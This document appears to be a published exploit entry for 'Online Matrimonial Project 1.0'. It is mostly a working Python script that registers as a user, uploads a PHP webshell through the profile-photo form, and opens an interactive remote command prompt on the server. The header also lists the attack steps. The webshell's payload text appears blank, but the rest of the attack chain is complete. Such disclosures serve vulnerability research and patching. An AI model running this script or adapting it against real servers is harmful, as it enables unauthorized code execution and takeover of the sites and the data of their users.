# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution # Exploit Author: Valerio Alessandroni # Date: 2020-10-07 # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/ # Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php # Version: 1.0 # Tested On: Server Linux Ubuntu 18.04, Apache2 # Version: Python 2.x # Impact: Code Execution # Affected components: Affected move_uploaded_file() function in functions.php file. # Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. # Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed. # # Additional information: # # To exploit this vulnerability: # 1) register a not privileged user at /register.php # 2) login in the application /login.php # 3) keep note of the redirect with the GET 'id' parameter /userhome.php?id=[ID] # 4) go to the page /photouploader.php?id=[ID] # 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "" # 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php # 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND] # # How to use it: # python exploit.py [URL] [USERNAME] [PASSWORD] import requests, sys, urllib, re, time from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) def webshell(SERVER_URL, ID, FILE_NAME): try: print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...') time.sleep(1) WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME getCMD = {'cmd': 'echo ciao'} r2 = requests.get(WEB_SHELL, params=getCMD) status = r2.status_code if status != 200: print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') while True: inputCMD = raw_input('$ ') command = {'cmd': inputCMD} r2 = requests.get(WEB_SHELL, params=command, verify=False) print r2.text except: print("\r\nExiting.") sys.exit(-1) def printHeader(): print(Fore.GREEN+"___ ___ _ _ _ "+Fore.RED+" ______ _____ _____") print(Fore.GREEN+"| \/ | (_)| | | |"+Fore.RED+" | ___ \/ __ \| ___|") print(Fore.GREEN+"| . . | __ _ _ __ _ | |_ __ _ | |"+Fore.RED+" | |_/ /| / \/| |__ ") print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+" | / | | | __| ") print(Fore.GREEN+"| | | || (_| || | | || |_| (_| || |"+Fore.RED+" | |\ \ | \__/\| |___ ") print(Fore.GREEN+"\_| |_/ \__,_||_| |_| \__|\__,_||_|"+Fore.RED+" \_| \_| \____/\____/ ") print '' if __name__ == "__main__": printHeader() if len(sys.argv) != 4: print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0]) print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0]) sys.exit(-1) SERVER_URL = sys.argv[1] SERVER_URI = SERVER_URL + 'auth/auth.php' LOGIN_PARAMS = {'user': '1'} LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'} req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False) print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...') time.sleep(1) for resp in req.history: COOKIES = resp.cookies.get_dict() SPLITTED = resp.headers["location"].split("=") ID = SPLITTED[1] print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].') time.sleep(1) SERVER_URI = SERVER_URL + 'photouploader.php' LOGIN_PARAMS = {'id': ID} LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'} FILE_NAME = 'shell.php' FILES = {'pic1': (FILE_NAME, ''), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')} req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False) print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.') time.sleep(1) webshell(SERVER_URL, ID, FILE_NAME)